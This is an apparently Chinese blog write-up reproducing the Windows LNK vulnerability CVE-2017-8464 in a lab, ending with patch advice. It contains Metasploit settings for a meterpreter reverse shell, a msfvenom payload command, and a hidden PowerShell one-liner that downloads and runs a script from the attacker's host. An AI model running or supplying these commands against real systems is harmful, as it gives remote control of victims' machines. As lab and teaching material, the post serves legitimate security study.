震网三代漏洞复现(CVE-2017-8464)
文章目录
- 影响版本
- 危害
- 漏洞原理
- 漏洞复现
- 任务环境
- 创建EXP
- 获取靶机权限
- 利用Powershell获取权限
- 修复建议
影响版本
Windows 7Windows 8.1Windows RT 8.1Windows 10Windows Server 2008Windows Server 2008 R2Windows Server 2012Windows Server 2012 R2Windows Server 2016
危害
被攻击机插入存在exp的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。
漏洞原理
当Windows搜索处理内存中的对象时,存在远程代码执行漏洞,攻击者可以利用此漏洞完全控制被攻击机。
漏洞复现
任务环境
- 攻击机:Kali2019
- 靶机:Win7 SP1
创建EXP
- 打开MSF,使用CVE_2017_8464漏洞模块
- 设置参数,LHOST(kali IP)、LPORT、payload
LHOST=192.168.1.106
LPORT=4444
payload=windows/meterpreter/reverse_tcp
- 创建EXP,exp存放在/root/.msf4/local/下
获取靶机权限
- 开启监听
- 将存有EXP的U盘插入靶机,并执行cpl文件
- 获得权限
利用Powershell获取权限
- 生成攻击文件exp.ps1并移动到网站根目录
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 -f psh-reflection>exp.ps1
- 开启监听
- 打开靶机,新建一个快捷键
- 输入构造的payload
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.106/exp.ps1‘);test.ps1"
- 运行创建好的powershell.exe文件
- 获取权限
修复建议
更新Windows操作系统补丁
禁用USB自动播放
安装杀毒软件
震网三代漏洞复现(CVE-2017-8464)相关推荐
- CVE2017-8464:震网三代漏洞分析
CVE2017-8464:震网三代漏洞分析(转) 转载 本文由Kilig原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/214846 安全 ...
- CVE-2017-8464(震网三代)漏洞分析与复现
目录 一.CVE-2017-8464漏洞简介 1.简介 2.CVE-2017-8464漏洞原理 3.漏洞影响范围 二.复现环境 三.漏洞复现 1.kali下生成一个反弹的ps1的shell,文件名为s ...
- 【从零复现CVE漏洞】Tenda 路由器栈溢出复现(CVE-2018-18708)
1 漏洞概述 从搜索引擎中搜索一下CVE会有很多提供CVE索引的网站,我们简要的看一下这个CVE的描述. An issue was discovered on Tenda AC7 V15.03.06. ...
- CVE(2017-15715、2021-41773、2021-40438)漏洞复现
仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...
- java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...
- Office 远程代码执行漏洞复现过程
本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录. 编辑 | 天津饭 直接贴本地复现过程,至于怎么利用还请自己思考. 2017年11月 ...
- Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...
- 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...
最新文章
- Idea 2018.2.5创建springboot项目依赖包没有的错误
- Python语言环境错误:不支持的语言环境设置
- Apache Spark 2.0预览: 机器学习模型持久化
- 线程的常用方法——currentThread方法||在main方法中直接调用run()方法,没有开启新的线程,以在run方法中的当前线程就是main线程||启动子线程,子线程会调用run方法
- 2. Nest:Controller
- 布局管理器 5-----绝对布局
- chrome 历史版本_2020 年最后一次更新,Chrome 性能大提升的新版本来了
- Git和GitHub使用教程
- ios退款 怎么定位到是哪个用户_关于ios企业签名必须知道的几点
- 图像缩放的双线性内插值算法的原理解析
- iOS培训章节——C++函数的重载
- JavaScript Demo - so cool
- HTTP和WebSocket协议(二)
- 如何在sh的字符串中包含换行符?
- [spark]Spark2.4.6用put写入写入Hbase1.3.1
- 23.2. REPLACE
- gdal-3.1.2-release下载页面出错
- Atitit junit最佳实践 目录 1.1. 可以在包级别建立测试,避免太多的test class	1 1.2. 但文件独立方法测试 避免建立太多的class	1 1.3. 测试方法直接从bat
- vi设计清单_最终产品设计组合清单
- 混合云架构下的安全风险分析和安全解决方案建议
热门文章
- 相变材料二氧化钒薄膜制备总结
- 教你辨别专利编号| 专利的专利号申请号公开号公告号
- RFID射频技术基本原理与射频技术中的基本单位
- qt5编译项目出现undefined reference to 'classname::staticmetaobject'
- 3D光场重建率先被中国团队推向零售商用!谷歌同款技术,哈佛高材生创办,高通投资认定...
- 影响PCBA制造的成本有很多方面,怎么有效降低成本?
- 一步步教你破解Termius(针对Termius持续更新导致失效解决,提供7.22.1老版本termius)|CSDN创作打卡
- 第五讲 中断、异常和信号
- 另眼看嘀嘀:打车类应用背后的政策风险
- oracle dba 连不上,Oracle 10g的DBA无法登录解决方案